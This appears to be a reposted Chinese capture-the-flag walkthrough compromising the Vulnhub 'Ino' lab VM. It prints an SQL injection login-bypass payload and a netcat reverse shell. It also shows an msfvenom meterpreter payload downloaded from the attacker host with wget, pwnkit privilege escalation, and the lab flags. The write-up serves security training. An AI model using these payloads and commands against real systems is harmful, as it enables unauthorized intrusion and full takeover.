Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)

这篇具有很好参考价值的文章主要介绍了Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Ino

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.253  08:00:27:f5:7e:8f      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.253

NMAP扫描

──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 00:34 EDT
Nmap scan report for localhost (192.168.56.253)
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 deb52389bb9fd41ab50453d0b75cb03f (RSA)
|   256 160914eab9fa17e945395e3bb4fd110a (ECDSA)
|_  256 9f665e71b9125ded705a4f5a8d0d65d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F5:7E:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

访问80端口,从返回的页面看CMS为Lot Reservation Management System

──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit Lot Reservation
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Lot Reservation Management System 1.0 - Authentication Bypass                               | php/webapps/48934.txt
Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)                       | php/webapps/48935.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

但目前不知道版本,先看一下有无其他目录可利用。

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.253
+ Target Hostname:    192.168.56.253
+ Target Port:        80
+ Start Time:         2023-04-16 00:40:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /lot/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-04-16 00:41:00 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

会被自动重定向到/lot目录。

用Gobuster工具无法识别目录:

──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.253/lot/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.253/lot/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/16 00:46:35 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.253/lot/: Get "http://192.168.56.253/lot/": dial tcp 192.168.56.253:80: connect: connection refused

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit -m php/webapps/48934.txt
  Exploit: Lot Reservation Management System 1.0 - Authentication Bypass
      URL: https://www.exploit-db.com/exploits/48934
     Path: /usr/share/exploitdb/exploits/php/webapps/48934.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Ino/48934.txt


                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat 48934.txt 
#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4


Proof of Concept:::

Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php

Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.


Malicious Request:::

POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id

username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B

You will be login as admin of the application.      

用绕过语句,

http://192.168.56.253/lot/admin/

用户名处: admin' or 1=1 --

密码处: admin' or 1=1 --

可以绕过管理后台。

在System Settings,可以上传shell.php文件

从而在Kali Linux上得到了目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 40798
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
 05:59:36 up 26 min,  0 users,  load average: 0.00, 0.21, 0.60
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$ cd /home
cd /home
www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 10  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
drwxr-xr-x  2 ppp  ppp  4.0K Dec  5  2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp  ppp  4.0K Dec  5  2020 .
drwxr-xr-x 3 root root 4.0K Oct 10  2020 ..
lrwxrwxrwx 1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp  ppp   220 Oct 10  2020 .bash_logout
-rw-r--r-- 1 ppp  ppp  3.5K Oct 10  2020 .bashrc
-rw-r--r-- 1 ppp  ppp   807 Oct 10  2020 .profile
-rw-r--r-- 1 ppp  ppp    33 Dec  5  2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a

这样就得到了用户flag.

提权

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf
                                                                                                                              
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ python -m http.server   
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


利用msfvenom工具生成payload,然后将escalate.elf上传至目标主机/tmp目录

www-data@ino:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-16 06:06:32--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-16 06:06:32 (65.6 MB/s) - 'escalate.elf' saved [207/207]

www-data@ino:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf

在Kali Linux启动handler

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

在目标主机的shell中运行./escalate.elf

从而得到meterpreter

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.253
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.253:44636) at 2023-04-16 01:07:39 -0400

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

利用local_exploit_suggester找到用于提权的漏洞利用模块

[*] 192.168.56.253 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.                                                                                                        
 3   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.                                                         

利用第1个模块实现提权

meterpreter > shell
Process 1409 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 28K
drwx------  3 root root 4.0K Dec  5  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
lrwxrwxrwx  1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root 3.5K Oct 26  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 27  2020 .ssh
-rw-------  1 root root   33 Dec  5  2020 proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5

从而拿到了root shell和root flag文章来源地址https://www.toymoban.com/news/detail-415290.html

到了这里,关于Vulnhub之Ino靶机详细测试过程(采用完全不同方法获得Shell以及本地提权)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)

    域名:ceng-company.vm 可能的用户名: kevin, aaron 其他:kevin可能密码比较弱 但是访问域名ceng-company.vm,返回页面内容没有发生变化 目录扫描没有啥收获,是否存在子域名? 发现admin子域名返回状态码为403 将该子域名加入到/etc/hosts文件: 访问admin.ceng-company.vm返回“Forbidden\\\",是

    2024年02月10日
    浏览(31)
  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(33)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(38)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(42)
  • Vulnhub之Healthcare靶机详细测试过程

    作者: jason huawen 名称: 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http) FTP不允许匿名访问 FTP服务为ProFTPD,可能存在mod_copy漏洞 robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误

    2023年04月22日
    浏览(53)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(40)
  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(35)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(43)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(36)
  • Vulnhub之Gain Power靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。 但是图片分析没有得到任何有意的结果。 假设用户

    2024年02月02日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包